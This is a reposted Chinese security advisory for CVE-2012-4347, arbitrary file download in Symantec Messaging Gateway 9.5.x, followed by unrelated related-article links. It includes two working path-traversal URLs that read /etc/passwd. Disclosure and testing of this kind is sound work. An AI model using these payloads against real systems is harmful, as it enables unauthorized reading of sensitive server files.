symantec+linux+升级包,Symantec Messaging Gateway任意文件下载漏洞
发布日期:2012-12-01
更新日期:2012-12-06
受影响系统:
Symantec Messaging Gateway 9.5.1
Symantec Messaging Gateway 9.5
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 56789
CVE(CAN) ID: CVE-2012-4347
Symantec Messaging Gateway是赛门铁克的电子邮件病毒保护软件。
Symantec Messaging Gateway 9.5.x存在多个任意文件下载漏洞,攻击者可利用这些漏洞在Web服务器上下载任意文件。
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/brightmail/export?type=logs&logFile=../../../etc/passwd&logType=1&browserType=1
http://www.example.com/brightmail/admin/restore/download.do?no-cache=false&displayTab=restore&restoreSource=APPLIANCE&localBackupFileSelection=../../etc/passwd
建议:
--------------------------------------------------------------------------------
厂商补丁:
Symantec
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
symantec+linux+升级包,Symantec Messaging Gateway任意文件下载漏洞相关推荐
- symantec+linux+升级包,symantec 10版本升级及灾难性恢复过程
一.如何将SAV 10.1升级到SAV 10.1.7.7000版本过程 ◆ 卸载SAV 10.1版的SSC系统控制台程序,重启计算机. ◆ 控制面板-添加删除程序-symantec system ce ...
- 任意文件下载漏洞知识点
文章目录 资料下载 任意文件下载 漏洞描述 利用条件 漏洞危害 漏洞发现 链接上 参数上 案例 漏洞利用 利用原理 windows路径 linux路径 修复建议 摘抄 资料下载 点击 下载 https ...
- 目录遍历漏洞和任意文件下载漏洞
目录浏览(目录遍历)漏洞 目录浏览漏洞是由于网站存在配置缺陷,导致网站目录可以被任意浏览,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件.配置文件等,攻击者利用该信息可以为进一步入侵网站做准备 ...
- 山东大学软件学院项目实训-创新实训-山大软院网络攻防靶场实验平台(十三)-任意文件下载漏洞(1)
目录 前言: 一.任意文件下载 1.任意文件下载漏洞简介 1.1.简介 1.2.危害 1.3.利用 1.4.防范 2.项目配置 前言: 前面的博客记录了关于文件上传漏洞的基础知识,以及基本的漏洞出现点 ...
- 致远OA任意文件下载漏洞(CNVD-2020-62422)
文章目录 漏洞描述 影响版本 payload poc 漏洞复现 修复补丁 漏洞描述 致远OA存在任意文件下载漏洞,攻击者可利用该漏洞下载任意文件,获取敏感信息 影响版本 致远OA A6-V5 致远OA ...
- (原创)浅谈任意文件下载漏洞的利用
文章写的一般,如果有错误的地方,请指教~ 0x01 任意文件下载常见利用方式 0x02 信息收集部分 0x03 代码审计部分 0x04 总结 0x01 前言 在web语言中,php和java常常会产生 ...
- AVCON6 系统管理平台 download.action 任意文件下载漏洞
漏洞描述: 华平信息技术股份有限公司是一家视讯产品与应用提供商,掌握视频处理.视音频编解码和网络适应性等.AVCON6 系统管理平台 download.action 存在任意文件下载漏洞,攻击者通过漏 ...
- 金蝶协同办公平台任意文件下载漏洞(无需登录)
经测试发现,该系统存在任意文件下载,且无需登录 存在漏洞的文件: /oa/admin/application/file_download.jsp?filePath=http://x.x.x.x:789 ...
- 大华城市安防监控系统平台管理存在任意文件下载漏洞
大华城市安防监控系统平台管理存在任意文件下载漏洞 1.大华城市安防监控系统平台管理存在任意文件下载漏洞 1.1.漏洞描述 1.2.漏洞影响 1.3.FOFA 2.漏洞复现 2.1.登录页面 2.2.抓 ...
最新文章
- not optimal php,php环境配置 配置
- 如何删除一个员工编号及其全部主数据和事务数据?
- 开源实时音视频技术WebRTC中RTP/RTCP数据传输协议的应用
- 分布式服务框架原理(一)设计和实现
- win10 家庭版系统,创建用户(users\account\ 中,文件的「所有者」属性)
- linux下给源码安装好的php支持pdo_mysql
- android 好看的计算器,从未见过如此丑的计算器 – 计算管家 #Android
- 如何用卡片法写论文?
- 计算机到期收益率公式,用到期收益率计算债券价格
- 2012服务器系统有什么版本的,Windows server 2012操作系统有哪几个版本
- rabbitmq新增用户
- element上传多个视频/多个图片与限制数量
- SpringCloud版本选择
- 从微软的万物互联到腾讯的三网:当今世界就是一台计算机!
- 计蒜客 - 德克萨斯长角牛(最短路)
- 中秋节的特别礼物----属于程序员的专有浪漫
- 机顶盒显示该服务器未授权,户户通提示E04该频道未授权的解决办法
- python dash教程_开发者必备神器Dash使用教程
- 一加手机怎么root权限_一加手机OnePlus卡刷获取root权限图文教程
- Android流媒体开发之 自定义一个完备的log模块
热门文章
- 干货 | 实际操作中,以租代购产品应该如何设计?
- L2-036 网红点打卡攻略 (25 分)
- MacOS苹果电脑各种常见音频问题集锦
- 《第7讲 视觉里程计1 》上 7.1~7.6单目模型 读书笔记
- 计算机保密管理员工作总结,机要保密员岗位年终工作总结
- 什么是百分比堆积条形图?
- 最近收集的9000个英语单词
- 大白话说C++——“引用”是个啥?
- 经济危机期间,给老总的生日祝福语【搞笑】
- 微型计算机最早出现在1946年是对还是错,2016年计算机一级期末考试真题(含答案)...